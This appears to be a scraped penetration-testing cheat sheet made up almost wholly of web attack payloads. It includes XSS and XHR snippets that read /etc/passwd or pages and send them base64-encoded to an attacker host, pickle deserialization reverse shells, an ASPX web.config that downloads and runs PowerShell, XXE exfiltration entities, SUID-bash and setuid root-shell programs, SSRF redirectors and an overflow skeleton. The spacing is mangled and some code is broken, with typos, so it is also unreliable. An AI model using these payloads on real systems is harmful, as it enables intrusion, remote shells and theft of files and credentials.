02 Vulnerability Analysis 03 Web Application Analysis Hypertext Markup Language (HTML) Hypertext Markup Language (HTML) Injection < script >
x = new XMLHttpRequest ;
x .onload = function (){
document .write (this .responseText )
};
x .open ("GET" ,"file:///etc/passwd" );
x .send ();
< /script > JavaScript (JS) Fetch Uniform Resource Locator (URL) and Base64 Encoding < script > fetch ('http ://<RHOST>/auth.php').then(r => r.text()).then(d => fetch("http://<LHOST>"+btoa(d)));</script> const Req1 = new XMLHttpRequest ();
Req1 .open ("GET" , "http://<RHOST>/index.php" , true);
Req1 .onload = function (Event ) {
const response = btoa (Req1 .response );
const Req2 = new XMLHttpRequest ();
Req2 .open ("GET" , "http://<LHOST>/?" + response , true);
Req2 .send ();
};
Req1 .send ();JavaScript Object Notation (JSON) JavaScript Object Notation (JSON) POST Request with Authentication POST /< PATH > HTTP /1.1
Host : < RHOST >
User - Agent : Mozilla /5.0 (X11 ; Linux x86_64 ; rv:78.0 ) Gecko /20100101 Firefox /78.0
Accept: * /*
Accept - Language : en - US ,en ;q = 0.5
Content - Type : application /json
Content - Length : 95
Connection: close
{
"auth" :{
"name" :"<USERNAME>" ,
"password" :"< PASSWORD > "
},
"filename" :"< FILE > "
}Python Pickle Remote Code Execution (RCE) import pickle
import sys
import base64
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat <LHOST> <LHOST> > /tmp/f'
class rce (object ):
def __reduce__ (self ):
import os
return (os .system ,(command ,))
print (base64 .b64encode (pickle .dumps (rce ())))import base64
import pickle
import os
class RCE :
def __reduce__ (self ):
cmd = ("/bin/bash -c 'exec bash -i &>/dev/tcp/<LHOST>/<LPORT> <&1'" )
return = os .system , (cmd , )
if __name__ == '__main__' :
pickle = pickle .dumps (RCE ())
print (bas64 .b64encode (pickled ))Python Redirect for Server-Side Request Forgery (SSRF) #!/usr/bin/python3
import sys
from http .server import HTTPServer , BaseHTTPRequestHandler
class Redirect (BaseHTTPRequestHandler ):
def do_GET (self ):
self .send_response (302 )
self .send_header ('Location' , sys .argv [1 ])
self .end_headers ()
HTTPServer (("0.0.0.0" , 80 ), Redirect ).serve_forever ()sudo python3 redirect .py http://127.0.0.1:3000/ #!/usr/bin/env python
import SimpleHTTPServer
import SocketServer
import sys
import argparse
def redirect_handler_factory (url ):
"""
returns a request handler class that redirects to supplied `url`
"""
class RedirectHandler (SimpleHTTPServer .SimpleHTTPRequestHandler ):
def do_GET (self ):
self .send_response (301 )
self .send_header ('Location' , url )
self .end_headers ()
def do_POST (self ):
self .send_response (301 )
self .send_header ('Location' , url )
self .end_headers ()
return RedirectHandler
def main ():
parser = argparse .ArgumentParser (description = 'HTTP redirect server' )
parser .add_argument ('--port' , '-p' , action = "store" , type = int , default = 80 , help = 'port to listen on' )
parser .add_argument ('--ip' , '-i' , action = "store" , default = "" , help = 'host interface to listen on' )
parser .add_argument ('redirect_url' , action = "store" )
myargs = parser .parse_args ()
redirect_url = myargs .redirect_url
port = myargs .port
host = myargs .ip
redirectHandler = redirect_handler_factory (redirect_url )
handler = SocketServer .TCPServer ((host , port ), redirectHandler )
print ("serving at port %s" % port )
handler .serve_forever ()
if __name__ == "__main__" :
main ()import requests
import re
http_proxy = "http://127.0.0.1:8080"
proxyDict = {
"http" : http_proxy ,
}
// get a session
r = requests .get ('http://' )
// send request
r = requests .post ('<RHOST>' , data = {'key' : 'value' }, cookies = {'PHPSESSID' : r .cookies ['PHPSESSID' ]} , proxies = proxyDict )Active Server Page Extended (ASPX) < ?xml version = "1.0" encoding = "UTF-8" ?>
< configuration >
< system .webServer >
< handlers accessPolicy = "Read, Script, Write" >
< add name = "web_config" path = "*.config" verb = "*" modules = "IsapiModule" scriptProcessor = "%windir%\system32\inetsrv\asp.dll" resourceType = "Unspecified" requireAccess = "Write" preCondition = "bitness64" />
< /handlers >
< security >
< requestFiltering >
< fileExtensions >
< remove fileExtension = ".config" />
< /fileExtensions >
< hiddenSegments >
< remove segment = "web.config" />
< /hiddenSegments >
< /requestFiltering >
< /security >
< /system .webServer >
< /configuration >
< !-- ASP code comes here ! It should not include HTML comment closing tag and double dashes !
< %
Set s = CreateObject ("WScript.Shell" )
Set cmd = s .Exec ("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://<LHOST>/shellyjelly.ps1')" )
o = cmd .StdOut .Readall ()
Response .write (o )
%>
-- > Extensible Markup Language (XML) Extensible Markup Language (XML) Hypertext Markup Language (HTTP) Request (XHR) in JavaScript (JS) var xhr = new XMLHttpRequest ();
xhr = new XMLHttpRequest ();
xhr .open ('GET ' , 'http ://localhost:8080/users/');
xhr .onreadystatechange = function () {
var users = JSON .parse (xhr .responseText );
if (xhr .readyState == = XMLHttpRequest .DONE && xhr .status == = 200 ) {
for (var i = 0 ; i < users .length ; ++ i ) {
console .table (users [i ]);
}
} else {
console .error ('There was a problem with the request . ' + users );
}
}
xhr .send ();myhttpserver = 'http ://<LHOST>/'
targeturl = 'http ://<RHOST>/'
req = new XMLHttpRequest ;
req .onreadystatechange = function () {
if (req .readyState == 4 ) {
req2 = new XMLHttpRequest ;
req2 .open ('GET ' , myhttpserver + btoa (this .responseText ),false);
req2 .send ();
}
}
req .open ('GET ' , targeturl , false);
req .send ();req = new XMLHTTPRequest ;
req .open ('GET ' ,"http://<RHOST>/revshell.php" );
req .send ();Extensible Markup Language (XML) External Entity (XXE) < ?xml version = "1.0" ?>
< !DOCTYPE foo [< !ENTITY % < NAME > SYSTEM
"http://<LHOST>/<FILE>.dtd" > %< NAME > ;]>
< root >
< method > GET < /method >
< uri > /< /uri >
< user >
< username > < NAME > ;< /username >
< password > < NAME > < /password >
< /user >
< /root > < !ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd" >
< !ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://<LHOST>/?f=%file;'>" >
%eval ;
%exfiltrate ;Cross-Site Scripting (XSS) JavaScript (JS) to read Files on the System (.js) const fs = require ('fs ' );
fs .readFile ('/etc /passwd ', 'utf8 ' , (err , data ) = > {
if (err ) throw err ;
console .log (data );
});Payload from Extensible Markup Language (XML) File < ?xml version = "1.0" encoding = "UTF-8" ?>
< html xmlns:html = "http://w3.org/1999/xhtml" >
< html :script > prompt (document .domain );< /html :script >
< /html > YAML Ain't Markup Language (YAML) Bad YAML Ain't Markup Language (YAML) - hosts : localhost
tasks :
- name : badyml
command : chmod + s /bin /bash 13 Social Engineering Tools #include <unistd.h>
#include <errno.h>
main ( int argc , char * * argv , char * * envp )
{
setuid (0 );
setgid (0 );
envp = 0 ;
system ("/bin/bash" , argv , envp );
return ;
}#include <stdio.h>
#include <stdlib.h>
#include <stdlib.h>
int main () {
setuid (0 );
setgid (0 );
system ("/bin/bash" );
return 0 ;
}Secure Shell (SSH) Program Execution #!/usr/bin/python
from pwn import *
s = ssh (host = '' , user = '' , password = '' )
p = s .run ('cd <PATH> && ./<VULNERABILITY>' )
p .recv ()
p .sendline (< payload > )
p .interactive ()
s .close ()Skeleton Exploit Python Script
https://github.com/0xsyr0/Buffer_Overflow
#!/usr /bin /python
import socket ,sys
address = '127.0 .0 .1 '
port = 9999
buffer = #TBD
try :
print '[+ ] Sending buffer '
s = socket .socket (socket .AF_INET , socket .SOCK_STREAM )
s .connect ((address ,port ))
s .recv (1024 )
s .send (buffer + '\r\n' )
except :
print '[!] Unable to connect to the application .'
sys .exit (0 )
finally :
s .close ()